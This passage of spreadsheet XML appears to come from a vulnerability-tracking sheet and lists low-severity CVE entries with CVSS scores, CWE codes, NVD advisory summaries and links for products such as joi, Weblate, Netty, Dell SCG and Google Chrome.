        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84367</t>
        </is>
      </c>
      <c r="D1208" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1208" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1208" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1208" s="5" t="inlineStr"/>
      <c r="H1208" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1208" s="5" t="inlineStr"/>
      <c r="J1208" s="5" t="inlineStr"/>
      <c r="K1208" s="5" t="inlineStr"/>
      <c r="L1208" s="5" t="inlineStr"/>
      <c r="M1208" s="5" t="inlineStr"/>
      <c r="N1208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1208" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1208" s="5" t="inlineStr"/>
      <c r="Q1208" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R1208" s="5" t="inlineStr">
        <is>
          <t>joi is a schema description language and data validator for JavaScript. From 16.0.0 until 17.13.5 and 18.2.4, joi's lib/types/keys.js internals.rename() implementation used by object().rename() permits a schema that renames keys with a regular-expression source and a Joi.expression() or Joi.x() target that interpolates the pattern's own match data, combined with { multiple: true }, to derive a target from an attacker-controlled input key. An attacker can send x-__proto__ with an object value, causing the target to render as __proto__ and set the prototype of the object returned by validate() instead of creating an own key. The global Object.prototype is not modified, so the effect is confined to the object returned by that validation call. Static-string targets and schemas using the default { multiple: false } are not affected. This issue is fixed in versions 17.13.5 and 18.2.4.</t>
        </is>
      </c>
      <c r="S1208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t>
        </is>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1209" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84368</t>
        </is>
      </c>
      <c r="D1209" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E1209" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1209" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1209" s="5" t="inlineStr"/>
      <c r="H1209" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1209" s="5" t="inlineStr"/>
      <c r="J1209" s="5" t="inlineStr"/>
      <c r="K1209" s="5" t="inlineStr"/>
      <c r="L1209" s="5" t="inlineStr"/>
      <c r="M1209" s="5" t="inlineStr"/>
      <c r="N1209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1209" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1209" s="5" t="inlineStr"/>
      <c r="Q1209" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R1209" s="5" t="inlineStr">
        <is>
          <t>joi is a schema description language and data validator for JavaScript. From 16.0.0 until 17.13.6 and 18.2.5, the @hapi/joi package through 17.1.1 and the successor joi package contain prototype pollution in lib/messages.js, where exports.compile() and exports.merge() reuse inherited objects for attacker-controlled language keys supplied through messages(), message(), prefs({ messages }), Joi.extend({ messages }), or rule({ message }). A language key named __proto__ writes properties onto Object.prototype, and constructor writes to the Object function's static properties. A consuming application that gates on the presence of an inherited property can take the wrong branch for every inspected object. The flaw is not reachable from data that joi validates and requires an application to feed untrusted input directly into schema-construction configuration. This issue is fixed in joi versions 17.13.6 and 18.2.5; no fixed @hapi/joi version is available.</t>
        </is>
      </c>
      <c r="S1209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t>
        </is>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1210" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33333</t>
        </is>
      </c>
      <c r="D1210" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1210" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1210" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1210" s="5" t="inlineStr"/>
      <c r="H1210" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1210" s="5" t="inlineStr"/>
      <c r="J1210" s="5" t="inlineStr"/>
      <c r="K1210" s="5" t="inlineStr"/>
      <c r="L1210" s="5" t="inlineStr"/>
      <c r="M1210" s="5" t="inlineStr"/>
      <c r="N1210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1210" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1210" s="5" t="inlineStr"/>
      <c r="Q1210" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="R1210" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is sensitive information disclosure in the error messages. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S1210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33333</t>
        </is>
      </c>
    </row>
    <row r="1211">
      <c r="A1211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46460</t>
        </is>
      </c>
      <c r="D1211" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1211" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1211" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1211" s="5" t="inlineStr"/>
      <c r="H1211" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1211" s="5" t="inlineStr"/>
      <c r="J1211" s="5" t="inlineStr"/>
      <c r="K1211" s="5" t="inlineStr">
        <is>
          <t>dell:powerscale_onefs</t>
        </is>
      </c>
      <c r="L1211" s="5" t="inlineStr"/>
      <c r="M1211" s="5" t="inlineStr"/>
      <c r="N1211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1211" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1211" s="5" t="inlineStr"/>
      <c r="Q1211" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1211" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS, versions 9.5.0.0 through 9.7.1.15, versions 9.8.0.0 through 9.13.1.0, and versions prior to 9.15.0.0, contain an Incorrect Authorization vulnerability. A low privileged adjacent network attacker could potentially exploit this vulnerability, leading to unauthorized modification of system logs.</t>
        </is>
      </c>
      <c r="S1211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46460</t>
        </is>
      </c>
    </row>
    <row r="1212">
      <c r="A1212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1212" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76816</t>
        </is>
      </c>
      <c r="D1212" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1212" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1212" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1212" s="5" t="inlineStr"/>
      <c r="H1212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1212" s="5" t="inlineStr"/>
      <c r="J1212" s="5" t="inlineStr"/>
      <c r="K1212" s="5" t="inlineStr"/>
      <c r="L1212" s="5" t="inlineStr"/>
      <c r="M1212" s="5" t="inlineStr"/>
      <c r="N1212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1212" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P1212" s="5" t="inlineStr"/>
      <c r="Q1212" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-626</t>
        </is>
      </c>
      <c r="R1212" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.137.Final and 4.2.17.Final, MqttEncoder does not validate client identifiers, will topics, usernames, and PUBLISH topic names before encoding, allowing prohibited null bytes in MQTT UTF-8 string fields and potentially causing routing, access-control, or identity mismatches in downstream brokers. The vulnerability is exploitable when an application uses Netty's MQTT encoder to construct messages from user-controlled input. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="S1212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76816</t>
        </is>
      </c>
    </row>
    <row r="1213">
      <c r="A1213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1213" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77508</t>
        </is>
      </c>
      <c r="D1213" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1213" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1213" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1213" s="5" t="inlineStr"/>
      <c r="H1213" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1213" s="5" t="inlineStr"/>
      <c r="J1213" s="5" t="inlineStr"/>
      <c r="K1213" s="5" t="inlineStr"/>
      <c r="L1213" s="5" t="inlineStr"/>
      <c r="M1213" s="5" t="inlineStr"/>
      <c r="N1213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1213" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1213" s="5" t="inlineStr"/>
      <c r="Q1213" s="5" t="inlineStr">
        <is>
          <t>CWE-302, CWE-841</t>
        </is>
      </c>
      <c r="R1213" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web based localization tool. Prior to 2026.8, an authenticated user can change the account's primary email through PUT or PATCH requests to /api/users/{username}/ without verifying the new address, allowing a later team invitation for that address to be accepted without access to the intended recipient's mailbox. This issue is fixed in version 2026.8.</t>
        </is>
      </c>
      <c r="S1213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77508</t>
        </is>
      </c>
    </row>
    <row r="1214">
      <c r="A1214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1214" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77573</t>
        </is>
      </c>
      <c r="D1214" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1214" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1214" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1214" s="5" t="inlineStr"/>
      <c r="H1214" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1214" s="5" t="inlineStr"/>
      <c r="J1214" s="5" t="inlineStr"/>
      <c r="K1214" s="5" t="inlineStr"/>
      <c r="L1214" s="5" t="inlineStr"/>
      <c r="M1214" s="5" t="inlineStr"/>
      <c r="N1214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1214" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1214" s="5" t="inlineStr"/>
      <c r="Q1214" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="R1214" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.8, a user permitted to manage component repository URLs can perform server-side request forgery against internal services through DNS rebinding during VCS operations. Weblate validates the hostname's first DNS resolution, but the external VCS clients that later connect perform a separate DNS lookup, so an attacker-controlled hostname that initially resolves to a public address can be re-pointed to an internal or private address before the connection is made. By triggering a clone, fetch, push, or similar remote operation, the attacker can cause Weblate to reach internal VCS-compatible services and potentially expose private repository contents. Installations that permit untrusted repository hostnames while using VCS_RESTRICT_PRIVATE=True are affected. This issue is fixed in version 2026.8.</t>
        </is>
      </c>
      <c r="S1214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77573</t>
        </is>
      </c>
    </row>
    <row r="1215">
      <c r="A1215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1215" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81846</t>
        </is>
      </c>
      <c r="D1215" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1215" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1215" s="5" t="inlineStr">
        <is>
          <t>44488dab-36db-4358-99f9-bc116477f914</t>
        </is>
      </c>
      <c r="G1215" s="5" t="inlineStr"/>
      <c r="H1215" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1215" s="5" t="inlineStr"/>
      <c r="J1215" s="5" t="inlineStr"/>
      <c r="K1215" s="5" t="inlineStr"/>
      <c r="L1215" s="5" t="inlineStr"/>
      <c r="M1215" s="5" t="inlineStr"/>
      <c r="N1215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1215" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1215" s="5" t="inlineStr"/>
      <c r="Q1215" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1215" s="5" t="inlineStr">
        <is>
          <t>An authorization bypass in the runZero Platform MCP service has been resolved in version 5.1.260826.0. This issue is an instance of CWE-639: Authorization Bypass Through User-Controlled Key and has an estimated CVSS score of CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N (3.5 Low).</t>
        </is>
      </c>
      <c r="S1215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81846</t>
        </is>
      </c>
    </row>
    <row r="1216">
      <c r="A1216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79693</t>
        </is>
      </c>
      <c r="D1216" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E1216" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1216" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1216" s="5" t="inlineStr"/>
      <c r="H1216" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1216" s="5" t="inlineStr"/>
      <c r="J1216" s="5" t="inlineStr"/>
      <c r="K1216" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1216" s="5" t="inlineStr"/>
      <c r="M1216" s="5" t="inlineStr"/>
      <c r="N1216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1216" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1216" s="5" t="inlineStr"/>
      <c r="Q1216" s="5" t="inlineStr">
        <is>
          <t>CWE-272</t>
        </is>
      </c>
      <c r="R1216" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Least Privilege Violation vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S1216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79693</t>
        </is>
      </c>
    </row>
    <row r="1217">
      <c r="A1217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79942</t>
        </is>
      </c>
      <c r="D1217" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E1217" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1217" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1217" s="5" t="inlineStr"/>
      <c r="H1217" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1217" s="5" t="inlineStr"/>
      <c r="J1217" s="5" t="inlineStr"/>
      <c r="K1217" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1217" s="5" t="inlineStr"/>
      <c r="M1217" s="5" t="inlineStr"/>
      <c r="N1217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1217" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1217" s="5" t="inlineStr"/>
      <c r="Q1217" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R1217" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Execution with Unnecessary Privileges vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S1217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79942</t>
        </is>
      </c>
    </row>
    <row r="1218">
      <c r="A1218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79944</t>
        </is>
      </c>
      <c r="D1218" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E1218" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1218" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1218" s="5" t="inlineStr"/>
      <c r="H1218" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1218" s="5" t="inlineStr"/>
      <c r="J1218" s="5" t="inlineStr"/>
      <c r="K1218" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1218" s="5" t="inlineStr"/>
      <c r="M1218" s="5" t="inlineStr"/>
      <c r="N1218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1218" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1218" s="5" t="inlineStr"/>
      <c r="Q1218" s="5" t="inlineStr">
        <is>
          <t>CWE-272</t>
        </is>
      </c>
      <c r="R1218" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Least Privilege Violation vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S1218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79944</t>
        </is>
      </c>
    </row>
    <row r="1219">
      <c r="A1219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87456</t>
        </is>
      </c>
      <c r="D1219" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E1219" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1219" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1219" s="5" t="inlineStr"/>
      <c r="H1219" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1219" s="5" t="inlineStr"/>
      <c r="J1219" s="5" t="inlineStr"/>
      <c r="K1219" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1219" s="5" t="inlineStr"/>
      <c r="M1219" s="5" t="inlineStr"/>
      <c r="N1219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1219" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1219" s="5" t="inlineStr"/>
      <c r="Q1219" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1219" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87456</t>
        </is>
      </c>
    </row>
    <row r="1220">
      <c r="A1220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87576</t>
        </is>
      </c>
      <c r="D1220" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E1220" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1220" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1220" s="5" t="inlineStr"/>
      <c r="H1220" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1220" s="5" t="inlineStr"/>
      <c r="J1220" s="5" t="inlineStr"/>
      <c r="K1220" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L1220" s="5" t="inlineStr"/>
      <c r="M1220" s="5" t="inlineStr"/>
      <c r="N1220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1220" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1220" s="5" t="inlineStr"/>
      <c r="Q1220" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1220" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87576</t>
        </is>
      </c>
    </row>
    <row r="1221">
      <c r="A1221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87647</t>
        </is>
      </c>
      <c r="D1221" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E1221" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1221" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1221" s="5" t="inlineStr"/>
      <c r="H1221" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1221" s="5" t="inlineStr"/>
      <c r="J1221" s="5" t="inlineStr"/>
      <c r="K1221" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1221" s="5" t="inlineStr"/>
      <c r="M1221" s="5" t="inlineStr"/>
      <c r="N1221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1221" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1221" s="5" t="inlineStr"/>
      <c r="Q1221" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1221" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in GPU in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87647</t>
        </is>
      </c>
    </row>
    <row r="1222">
      <c r="A1222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1222" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38093</t>
        </is>
      </c>
      <c r="D1222" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1222" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1222" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1222" s="5" t="inlineStr"/>
      <c r="H1222" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1222" s="5" t="inlineStr"/>
      <c r="J1222" s="5" t="inlineStr"/>
      <c r="K1222" s="5" t="inlineStr"/>
      <c r="L1222" s="5" t="inlineStr"/>
      <c r="M1222" s="5" t="inlineStr"/>
      <c r="N1222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1222" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P1222" s="5" t="inlineStr"/>
      <c r="Q1222" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1222" s="5" t="inlineStr">
        <is>
          <t>file_picker (aka flutter_file_picker) for Flutter, all versions through 10.3.10, is vulnerable to path traversal (CWE-22) in its Android implementation. The openFileStream() method in FileUtils.kt uses the DISPLAY_NAME obtained from ContentResolver.query() directly in file path construction without sanitization. A malicious Android app with a crafted ContentProvider can return a filename containing ../ sequences, causing the plugin to create arbitrary files and directories outside the intended cache directory within the victim app's internal storage. Existing files are not overwritten due to an existence check.</t>
        </is>
      </c>
      <c r="S1222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38093</t>
        </is>
      </c>
    </row>
    <row r="1223">
      <c r="A1223" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1223" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54548</t>
        </is>
      </c>
      <c r="D1223" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1223" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1223" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1223" s="5" t="inlineStr"/>
      <c r="H1223" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1223" s="5" t="inlineStr"/>
      <c r="J1223" s="5" t="inlineStr"/>
      <c r="K1223" s="5" t="inlineStr"/>
      <c r="L1223" s="5" t="inlineStr"/>
      <c r="M1223" s="5" t="inlineStr"/>
      <c r="N1223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1223" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1223" s="5" t="inlineStr"/>
      <c r="Q1223" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1223" s="5" t="inlineStr">
        <is>
